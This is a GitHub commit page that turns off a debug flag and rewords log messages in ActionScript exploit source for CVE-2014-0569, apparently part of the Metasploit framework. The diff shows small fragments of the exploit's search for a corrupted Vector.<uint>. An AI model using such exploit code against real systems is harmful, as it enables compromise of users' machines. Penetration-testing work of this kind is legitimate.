Skip to content

Commit 39851d2

Browse files
committed
Unset debug flag
1 parent b7f0fad commit 39851d2

File tree

3 files changed

+3
-3
lines changed

3 files changed

+3
-3
lines changed

data/exploits/CVE-2014-0569/msf.swf

0 Bytes
Binary file not shown.

external/source/exploits/CVE-2014-0569/Exploit.as

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -66,7 +66,7 @@ package
6666
try {
6767
var uint_vector_pos:uint = search_uint_vector()
6868
} catch (err:Error) {
69-
Logger.log("Vector.<uint> not found :(")
69+
Logger.log("[!] Exploit - Corrupted Vector.<uint> not found")
7070
return
7171
}
7272

@@ -76,7 +76,7 @@ package
7676
for (i = 0; i < ov.length; i++) {
7777
if (ov[i].length > 1024) {
7878
uv = ov[i]
79-
Logger.log("Vector.<uint> corrupted found :)")
79+
Logger.log("[*] Exploit - Corrupted Vector.<uint> found")
8080
} else {
8181
ov[i] = null
8282
}

external/source/exploits/CVE-2014-0569/Logger.as

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,7 @@ package
33
import flash.external.ExternalInterface
44

55
public class Logger {
6-
private static const DEBUG:uint = 1
6+
private static const DEBUG:uint = 0
77

88
public static function alert(msg:String):void
99
{

0 commit comments

Comments
 (0)